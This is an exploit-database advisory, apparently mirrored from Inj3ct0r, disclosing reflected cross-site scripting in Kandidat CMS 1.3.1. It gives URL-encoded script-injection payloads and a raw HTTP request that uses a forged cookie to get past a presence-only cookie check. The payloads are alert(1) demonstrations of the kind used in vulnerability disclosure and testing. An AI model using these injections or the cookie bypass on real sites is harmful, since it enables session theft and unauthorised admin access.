Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:23367
HistoryMar 11, 2010 - 12:00 a.m.

Kandidat CMS versions 1.3.1 Cross Site Scripting Vulnerability

2010-03-1100:00:00
vulners.com
29

==============================================================
Kandidat CMS versions 1.3.1 Cross Site Scripting Vulnerability

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'`\ /\ \ /'`\ 0
0 /\, \ ___ /\\/\\ \ \ \ \ ,\/\ \/\ \ _ ___ 1
1 \/
/\ \ /' _ `\ \/\ \/
/
\< /'
\ \ \/\ \ \ \ \/\`'\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \
/\ \ \\ \ \\ \ \ \/ 1
1 \ \\ \\ \\\ \ \ \/\ \\\ \
\\ \/\ \\ 0
0 \/
/\/
/\/
/\ \\ \/
/ \// \// \// \// 1
1 \ \
/ >> Exploit database separated by exploit 0
0 \/
/ type (local, remote, DoS, etc.) 1
1 0
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1

#[+] Discovered By : Inj3ct0r
#[+] Site : Inj3ct0r.com
#[+] support e-mail : submit[at]inj3ct0r.com

Manufacturer: kan-studio.ru
Product Kandidat CMS v.1.3.1
pXSS
it works with register_globals = on

http://kandidat/admin/login.php?contentcenter=123&#39;&#37;22&#37;3E&#37;3Cscript&#37;3Ealert&#40;1&#41;&#37;3C/script&#37;3E

in the source code is checked, only the presence of cookie :

get http://kandidat/media/upload.php?contentcenter=&lt;script&gt;alert&#40;1&#41;&lt;/script&gt; HTTP/1.0
Host: kandidat
Cookie: KNcookies=123;
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Proxy-Connection: Keep-Alive

~ - [ [ : Inj3ct0r : ] ]